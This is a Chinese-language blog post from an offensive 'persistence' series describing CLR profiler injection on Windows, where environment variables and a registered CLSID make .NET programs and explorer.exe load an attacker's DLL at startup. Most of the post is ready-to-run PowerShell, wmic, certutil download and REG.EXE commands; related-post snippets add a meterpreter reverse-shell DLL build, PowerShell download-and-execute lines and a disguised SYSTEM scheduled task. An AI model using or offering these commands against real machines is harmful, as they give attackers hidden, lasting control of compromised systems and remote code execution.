WEB渗透权限维持篇-CLR-Injection

已于 2024-09-10 12:29:07 修改
阅读量161 收藏
点赞数 3
分类专栏: 渗透测试 文章标签: WEB安全 网络安全 WEB渗透 Windows 权限维持
于 2024-09-08 14:50:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59468567/article/details/142026948
版权

 往期文章
WEB渗透权限维持篇-DLL注入\劫持-CSDN博客

WEB渗透权限维持篇-CLR-Injection-CSDN博客 

WEB渗透权限维持篇-计划任务-CSDN博客

WEB渗透权限维持篇-DLL注入-修改内存中的PE头-CSDN博客 

WEB渗透权限维持篇-DLL注入-进程挖空(MitreT1055.012)-CSDN博客

WEB渗透权限维持篇-MSSQL后门-CSDN博客

 WEB渗透权限维持篇-禁用Windows事件日志-CSDN博客

 

劫持调用.net程序,开机启动
https://github.com/3gstudent/CLR-Injection/blob/master/CLR-Injection_x64.bat

image

image

WMIC可替换为powershell

New-ItemProperty "HKCU:\Environment\" COR_ENABLE_PROFILING -value "1" -propertyType string | Out-Null

New-ItemProperty "HKCU:\Environment\" COR_PROFILER -value "{11111111-1111-1111-1111-111111111111}" -propertyType string | Out-Null

wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"
wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll delete

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll delete

SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg_x64.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F 
SET KEY=HKEY_CURRENT_USER\Software\Classes\WoW6432Node\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F

添加全局变量

计算机\HKEY_CURRENT_USER\Environment
COR_ENABLE_PROFILING=1
COR_PROFILER={11111111-1111-1111-1111-111111111111}

注册CLSID

计算机\HKEY_CURRENT_USER\Software\Classes\CLSID添加项{11111111-1111-1111-1111-111111111111}和它的子项InprocServer32 新建一个键ThreadingModel,键值为:Apartment,默认键值为dll路径 劫持explorer.exe

>SET COR_ENABLE_PROFILING=1
>SET COR_PROFILER={11111111-1111-1111-1111-111111111111}

位置(新建) HKEY_CURRENT_USER\Software\Classes\CLSID{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32默认值为恶意DLL 新建ThreadingModel值为Apartment

Pluto-2003
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
WEB渗透权限维持-计划任务
qq_59468567的博客
09-08 154
创建计划任务 >schtasks /create /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\update.exe" /sc DAILY /mo 1 /ST 12:25 /RU SYSTEM 查看计划任务 >schtasks /query | findstr "windowsupdate" 立即执行某项计划任务 >schtasks /run /tn "windowsupdate" 删除某项计划任务 >schtasks /delete /F
WEB渗透权限维持-MSSQL后门
qq_59468567的博客
09-10 207
http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp.psm1 >powershell -ep bypass >IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Powershellery/Stable-ish/MSSQL/Invoke-SqlServer-Persist-StartupSp
WEB渗透权限维持-DLL注入\劫持
qq_59468567的博客
09-08 289
生成DLL >msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=6666 -f dll -o /var/www/html/x.dll >use exploit/multi/handler >set payload windows/x64/meterpreter/reverse_tcp >Powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient)
WEB渗透权限维持-禁用Windows事件日志
qq_59468567的博客
09-10 101
从上面的屏幕截图中,尚不清楚哪个进程真正托管了该服务,但是如果我们继续在Process Hacker中逐个检查进程,我们最终将找到托管该服务的进程,当前为pid 2196:EventLog svchost.exe
WEB渗透权限维持-DLL注入-修改内存中的PE头
qq_59468567的博客
09-09 261
将修改新创建进程内存中的 PE 标头,以将我们自己的 DLL 添加到导入描述符列表中 1 使用带有 CREATE_SUSPENDED 标志的 CreateProcess 创建目标 EXE 进程的挂起实例。 2 计算目标EXE的基地址,使用NtQueryInformationProcess读取目标进程的PEB地址,使用ReadProcessMemory读取ImageBaseAddress字段值。 3 使用 ReadProcessMemory 从目标进程读取主 PE 头(IMAGE_NT_HEADERS)
WEB渗透权限维持-DLL注入-进程挖空(MitreT1055.012)
qq_59468567的博客
09-10 134
第 2 步:交换其内存内容(取消映射/挖空): NtUnmapViewOfSection() 可以使用以下方法完成: NtQueryProcessInformation + ReadProcessMemory 此外,可以使用单个函数轻松完成: ReadRemotePEB(pProcessInfo->hProcess) PPEB pPEB = ReadRemotePEB(pProcessInfo->hProcess); 从 PEB 的图像地址读取 NT Headers 格式(从 PE 结构)。这是必不可少的,
WEB渗透Win提权-BypassUAC
qq_59468567的博客
08-27 274
提权工具合集包(免费分享): 夸克网盘分享WEB渗透Win提权-RDP&Firewall-CSDN博客WEB渗透Win提权-MSSQL-CSDN博客WEB渗透Win提权-MYSQL-udf-CSDN博客WEB渗透Win提权-AccountSpoofing-CSDN博客WEB渗透Win提权-弱权限提权-CSDN博客 DccwBypassUAC CMSTP Bypass-UAC DLL hijack SilentClean
内网渗透系列:权限维持方法小结
闵行小鱼塘
08-02 2404
小结下权限维持方法
Notes Fifteenth Day-渗透攻击-红队-内部信息搜集
热门推荐
qq_34801745的博客
10-01 1万+
** Notes Fifteenth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-10-1 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更
lein-clr:Leiningen插件可自动完成ClojureCLR项目的构建任务
05-06
lein-clr插件需要在project.clj使用:clr键来获取CLR相关的详细信息。 有关示例,请参见 。 以下小节显示了如何入门。 快速入门分为3个步骤-要求curl / wget并在PATH unzip (假设你是在Windows上使用最新版本的.NET...
Keyboard-Tracer-CLR
04-09
键盘追踪器-CLR 键盘跟踪器是一种易于使用的工具,可以在您自己的计算机上记录键盘并监视击键。 但是,此软件不记录由于没有创建此应用程序来存储键盘字符的原因而被按下的特定键。 尽管此软件跟踪并监视了多少次...
natsu-clr:il2cpp编译器和运行时与.Net Core兼容
02-05
natsu-clr是il2cpp编译器,其运行时与.Net Core兼容。 natsu-clr是一个兼容.Net Core的IL2CPP编译器和运行时。 产品特点 兼容.Net Core 3.0 内存占用少 非常便携 易于与C ++互操作 编译时vtable和变量初始值设定项...
clr-boot-manager:内核和引导加载程序管理
05-31
clr-boot-manager clr-boot-manager 的存在是为了在升级过程中正确维护供应商内核和适当的垃圾收集策略。 该实现提供了在共享引导目录(例如 UEFI 引导操作系统的 EFI 系统分区)上启用正确共存的方法。 特别注意...
推荐-CLR.via.C#(第3版).pdf
05-21
针对CLR和.net framework4.0进行深入、全面的探讨。第一部分介绍CLR基础,第二部分解释如何设计类型,第3部分介绍基本类型,第4部分以实用特性为主题,第5部分重点介绍线程处理。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8455
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
用交流和直流网络实现的西景电气中的飞机电力网simulink实现.rar
09-10
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
井下甲烷气体报警器研发(工程教育课程项目报告)
09-10
井下甲烷气体报警器研发(工程教育课程项目报告)
2023-04-06-项目笔记 - 第二百五十二阶段 - 4.4.2.20全局变量的作用域-250 -2025.09.10
最新发布
09-10
2023-04-06-项目笔记-第二百五十二阶段-课前小分享_小分享1.坚持提交gitee 小分享2.作业中提交代码 小分享3.写代码注意代码风格 4.3.1变量的使用 4.4变量的作用域与生命周期 4.4.1局部变量的作用域 4.4.2全局变量的作用域 4.4.2.1全局变量的作用域_1 4.4.2.250局变量的作用域_250- 2024-09-10
var(--clr)
05-25
`var(--clr)` 是 CSS 中的变量,它可以用来定义一个可重复使用的颜色值或其他值。在使用时,可以通过 `var()` 函数引用这个变量,例如: ```css :root { --clr: #ff0000; } h1 { color: var(--clr); } ``` 这样,在页面中所有使用 `var(--clr)` 的地方,都会被替换成 `#ff0000` 这个颜色值。这种方式可以让我们更方便地管理页面中的颜色值,而不需要每次都手动修改所有的样式规则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pluto-2003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值